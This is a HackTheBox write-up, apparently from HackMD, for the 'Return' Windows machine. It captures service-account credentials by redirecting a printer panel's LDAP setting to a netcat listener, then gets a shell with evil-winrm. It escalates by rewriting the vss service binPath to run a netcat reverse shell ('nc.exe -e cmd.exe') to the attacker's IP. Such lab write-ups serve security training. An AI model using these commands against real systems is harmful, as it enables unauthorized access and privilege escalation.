Try   HackMD

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Enumeration

╭─tahaafarooq at urchinsec in ~/Desktop/hackthebox/machines/return
╰─○ nmap -A 10.129.95.241 -oN nmap-scan
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-07 12:24 EAT
Nmap scan report for 10.129.95.241
Host is up (0.16s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE       VERSION
53/tcp    open     domain?
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2021-12-07 09:44:18Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
49154/tcp filtered unknown
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 18m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-12-07T09:46:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 322.67 seconds

We have multiple ports open , and it seems port 80 is running with an admin panel for a printer, we also got SMB opened , and we have an LDAP port opened , this is a really interesting box

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

FootHold

First thing I do now is visit the port 80:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

I visited the Settings which was in http://return.htb/settings.php and found a subdomain : http://printer.return.local so I now add that to my /etc/hosts file

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

So we also got svc-printer as username!

But basically these printer's configuration page allow a user to set a way of grabbing the queries of user list and passwords from the LDAP or AD port so , what if I made a listener of port 389 which is LDAP , and then I change the server address on the settings and see what will happen:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More → 

╰─○ sudo nc -lvnp 389
Listening on 0.0.0.0 389
Connection received on 10.129.95.241 49570
0*`%return\svc-printer�
                       1edFg43012!!

So I got the password 1edFg43012!! , And now I just use my sweet evil-winrm to try gain an instance of shell from the creds I got:

╰─○ evil-winrm -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami
return\svc-printer

Privilege Escalation

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled

Not much but useful, decided to check the group I was in, i hope I was in Administrators but it twisted wrong

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 12:15:13 AM
Password expires             Never
Password changeable          5/27/2021 12:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/26/2021 12:39:29 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

So svc-printer is part of Server Operators : https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators

So I now understood that it was easy for me to get a quick revshell as NT Authority/system , I first set a reverse shell listener on port 1234, since members of this group are able to start and stop services now after firing up the listener , I will exploit the vss service running with sc.exe which is alternative of systemctl in linux , but first things first , Upload NETCAT :

*Evil-WinRM* PS C:\Users\svc-printer\Documents> upload nc.exe
Info: Uploading nc.exe to C:\Users\svc-printer\Documents\nc.exe

                                                             
Data: 51488 bytes of 51488 bytes copied

Info: Upload successful!

And now the good part is to misconfigure the service! that is about to run :

*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.15 1234"
[SC] ChangeServiceConfig SUCCESS

We start stop the service , if it's running with the command sc.exe stop vss and then we start our service which will execute our netcat revshell:

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

And now we have access to Administrator account!

The user.txt flag can be found in Desktop for svc-printer and for root.txt inside Desktop for Administrator

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Last changed by 
Tahaa Farooq
お前はもう死んでいる
0
3
887

Read more

UnderPass Hackthebox Writeup

An easy box from HTB, we first get access to daloradius with weak credentials using them to expose a potential user with his hashed (weak) password, I crack the password ending up getting the plaintext password and we use the password to login to the host via SSH! Easy Win! Lastly we escalate our privileges by taking advantage of Mosh (Mobile Shell). 🚀

May 10, 2025
Secret Writeup Hackthebox

So found 3 open ports , 22(SSH), 80(HTTP) , 3000(HTTP) with Node.js , Opening port 80 it had a landing page which was titled Dump Docs , and both were also there on port 3000 with a file named files.zip attached which contains the source code of how the api works

Apr 27, 2025
DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

With default credential for the guest user “guest:guest” to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users.

Feb 20, 2025
File Transfer Tricks

As a penetration tester, you have happened to gain access to a few target hosts (windows & linux) within the scope of your engagement and you are now required to transfer some files from your host to the target's host and vise versa, what do you do?

Jan 13, 2025
Read more from Tahaa Farooq
Published on HackMD